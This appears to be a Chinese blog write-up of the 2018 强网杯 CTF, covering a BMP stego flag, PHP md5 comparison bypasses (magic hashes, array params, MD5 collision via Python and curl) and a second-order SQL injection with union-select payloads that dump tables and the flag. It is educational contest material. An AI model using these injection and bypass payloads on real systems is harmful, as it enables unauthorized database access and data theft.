划水之强网杯2018writeup

Posted on | In

welcome

这题下载下来一个bmp文件,尝试最低位隐写无果后,尝试offset,最后在offset100位后找到flag

flag: qwb{W3lc0me}

web签到

1
题目地址:`http://39.107.33.96:10000/`

第一层:使用了弱等于,php弱类型绕过 0e开头的全部相等

1
2
3
if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
	die("success!");
}

payload

1
param1=240610708&param2=QNKCDZO

第二层:使用了强等于(不仅检查数值还检查类型),md5函数无法处理数组参数返回NULL 

1
2
3
if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
	die("success!");
}

payload

1
param1[]=1&param2[]=2

第三层:使用了强等于和强制字符串转化

1
2
3
if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
	die("success!");
}

脚本参考

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python
import requests
import hashlib
import urllib
import binascii

param1 = """
0e306561559aa787d00bc6f70bbdfe34
04cf03659e704f8534c00ffb659c4c87
40cc942feb2da115a3f4155cbb860749
7386656d7d1f34a42059d78f5a8dd1ef
"""

param2 = """
0e306561559aa787d00bc6f70bbdfe34
04cf03659e744f8534c00ffb659c4c87
40cc942feb2da115a3f415dcbb860749
7386656d7d1f34a42059d78f5a8dd1ef
"""

print '[+] create URL decoded strings to send as POST parameters [param1] and [param2]...'
param1 = ''.join(param1.split('\n'))
param2 = ''.join(param2.split('\n'))

param1str = binascii.unhexlify(param1)
param2str = binascii.unhexlify(param2)

print '[+] calculate md5 value...'
print "md5(param1): "+hashlib.md5(param1str).hexdigest()
print "md5(param2): "+hashlib.md5(param2str).hexdigest()

print '[+] sending request...'

url = 'http://39.107.33.96:10000/'
payload = {'param1':param1str,'param2':param2str}
headers = {'Cookie':'PHPSESSID=on8uv0kfij2h7lm2uramtluo53','Host':'39.107.33.96:10000'}

resp = requests.post(url=url, headers=headers,data=payload)

print '[+] read FLAG from response...\n\n'
print resp.content

Note: 若本题为GET提交参数,只需param1和param2进行urlencode提交即可,无需urllib.unquote步骤

附 l3m0n师傅的解法:

1
curl -v http://39.107.33.96:10000/ -H "Cookie: PHPSESSID=on8uv0kfij2h7lm2uramtluo53" --data "param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"

Flag: QWB{s1gns1gns1gnaftermd5}

Three hit

1
题目地址:http://39.107.32.29:10000

这个题目是一个二次注入,用户注册会将age存入数据库,登陆成功后profile.php界面会从数据库中查询具有相同age的username。

二次注入:源于开发人员对数据库中的数据太过信任,凡是提取数据库中来自用户的数据不经过处理,即可触发二次注入。

测试过程中发现age必须为数字。于是通过hex编码绕过

payload

1
2
3
4
5
6
7
8
9
10
寻找注入点:
1 and 1=2 union select 1#        
1 and 1=2 union select 1,2#      
1 and 1=2 union select 1,2,3,4#  

three hit:爆库、爆表、爆字段
1 and 1=2 union select 1,(select database()),3,4#
1 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='qwb'),3,4#
1 and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3,4#
1 and 1=2 union select 1,(select flag from flag),3,4#

坚持原创技术分享,您的支持将鼓励我继续创作!